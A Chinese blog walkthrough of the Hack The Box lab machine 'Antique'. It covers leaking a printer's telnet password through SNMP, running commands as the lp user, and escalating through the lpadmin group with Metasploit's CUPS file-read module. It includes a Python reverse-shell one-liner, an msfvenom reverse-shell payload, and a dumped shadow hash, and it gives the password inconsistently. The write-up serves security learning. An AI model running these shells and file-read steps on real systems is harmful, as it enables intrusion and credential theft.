文件随意信息泄露/【HTB】Antique(SNMP信息泄露,lpadmin用户组任意文件读取)_入门黑客技巧

文件随意信息泄露/【HTB】Antique(SNMP信息泄露,lpadmin用户组任意文件读取)_入门黑客技巧

本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。

服务探测

┌──(rootkali)-[~/htb/Antique]
└─# nmap -sV -Pn 10.10.11.107
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 07:44 EST
Nmap scan report for 10.10.11.107
Host is up (0.39s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.91%I=7%D=11/30%Time=61A61CDF%P=x86_64-pc-linux-gnu%r(NUL
SF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPa
SF:ssword:\x20")%r(tn3270,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(GetRe
SF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\x
SF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DN
SF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatus
SF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPassword
SF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Kerb
SF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswo
SF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%
SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19
SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\
SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalS
SF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2
SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19,
SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirec
SF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20"
SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20Jet
SF:Direct\n\nPassword:\x20");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 229.74 seconds

23端口开了一个服务,nc连上去看看

┌──(rootkali)-[~/htb/Antique]
└─# nc 10.10.11.107 23             
HP JetDirect
ls
Password: 123456
Invalid password

问候语是HP ,查了一下是惠普的打印机

需要一个密码才能登陆,但是不需要账号

根据HP 作为关键字在谷歌上找到这篇文章

利用 a using the SNMP 的方法,我们输入以下信息

──(rootkali)-[~/htb/Antique]
└─# snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Created directory: /var/lib/snmp/cert_indexes
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135 

把上面的数字拿到这个网站,解得密码是:P@@123!!123

用上面的凭证登陆账号

┌──(rootkali)-[~/htb/Antique]
└─# nc 10.10.11.107 23
HP JetDirect
Password: P@ssw0rd@123!!123
Please type "?" for HELP
> ?
To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>
Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)
addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)
exec: execute system commands (exec id)
exit: quit from telnet session
> exec id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
> exec whoami
lp
/var/spool/lpd
> exec find / -name user.txt
/home/lp/user.txt
/var/spool/lpd/user.txt

提权

查看系统相关信息

> exec uname -a
Linux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
> exec python3 --version
Python 3.8.10

发现安装了,用下面命令反弹一个趁手的shell

exec -c ' ,os,pty;s=.(.,.);s.(("10.10.14.15",4242));os.dup2(s.(),0);os.dup2(s.(),1);os.dup2(s.(),2);pty.spawn("/bin/sh")'

┌──(rootkali)-[~/htb/Antique]
└─# nc -lnvp 4242                                                                                                                                                                                                                            1 ⨯
listening on [any] 4242 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.107] 41100
$ id
id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
$ 

我们发现这个用户组比较可疑,可能可以用于提权,经过谷歌以后,我找到了这篇文章

里面提到:

of can read every file on via cups

这个用户组的人可以读取系统里面的任意文件,于是继续搜索提权脚本,最后发现一个msf的模块multi//可以用于提权

我们先编译一个msf的反弹shell

-p linux/x86// LHOST=10.10.14.15 LPORT=4444 -f elf > shell.elf

传到靶机,触发,拿到msf,执行提权脚本

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.15:4444 
[*] Sending stage (980808 bytes) to 10.10.11.107
[*] Meterpreter session 2 opened (10.10.14.15:4444 -> 10.10.11.107:52856) at 2021-11-30 11:46:50 -0500
meterpreter > run multi/escalate/cups_root_file_read
[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /etc/shadow (998 bytes) saved to /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
[*] Cleaning up...
meterpreter > getuid

查看/etc/文件

┌──(rootkali)-[~/htb/Antique]
└─# cat /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
landscape:*:18375:0:99999:7:::
pollinate:*:18375:0:99999:7:::
systemd-coredump:!!:18389::::::
lxd:!:18389::::::
usbmux:*:18891:0:99999:7:::  

编辑成john可以读取的格式

┌──(rootkali)-[~/htb/Antique]
└─# cat shadow.txt 
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
                                                                                                                                                                                                                      
┌──(rootkali)-[~/htb/Antique]
└─# unshadow passwd.txt shadow.txt > unshadowed.txt
                                                                                                                                                                                                                      
┌──(rootkali)-[~/htb/Antique]
└─# cat unshadowed.txt 
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:0:0:root:/root:/bin/bash

但是我没办法爆破出这个密码

于是转换思路,root下会不会有文件编辑msf模块

msf6 > use multi/escalate/cups_root_file_read
msf6 post(multi/escalate/cups_root_file_read) > edit

把46行改成/root/.ssh/

编辑保存

下载到本地

meterpreter > run multi/escalate/cups_root_file_read
[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /root/.ssh/id_rsa (341 bytes) saved to /root/.msf4/loot/20211130120322_default_10.10.11.107_cups_file_read_145418.bin
[*] Cleaning up...

然而没有这个文件:

┌──(rootkali)-[~]
└─# cat /root/.msf4/loot/20211130120601_default_10.10.11.107_cups_file_read_604992.bin
span class="hljs-keyword">HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
        <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
        <TITLE>Not Found - CUPS v1.6.1TITLE>
        <LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
HEAD>
<BODY>
<H1>Not FoundH1>
<P>P>
BODY>
HTML>   

最后只好把/root/root.txt下载到本地,弄完已经凌晨一点多,算是结束这次渗透

meterpreter > run multi/escalate/cups_root_file_read
[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /root/root.txt (32 bytes) saved to /root/.msf4/loot/20211130120724_default_10.10.11.107_cups_file_read_556098.txt
[*] Cleaning up...

网络安全学习路线图(思维导图)

网络安全学习路线图可以是一个有助于你规划学习进程的工具。你可以在思维导图上列出不同的主题和技能,然后按照逻辑顺序逐步学习和掌握它们。这可以帮助你更清晰地了解自己的学习进展和下一步计划。

1. 网络安全视频资料

2. 网络安全笔记/面试题

3. 网安电子书PDF资料

如果你向网安入门到进阶的全套资料,我都打包整理好了,需要学习的小伙伴可以V我找我拿~

学网络安全/学黑客,零基础资料整理来啦~~~

~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值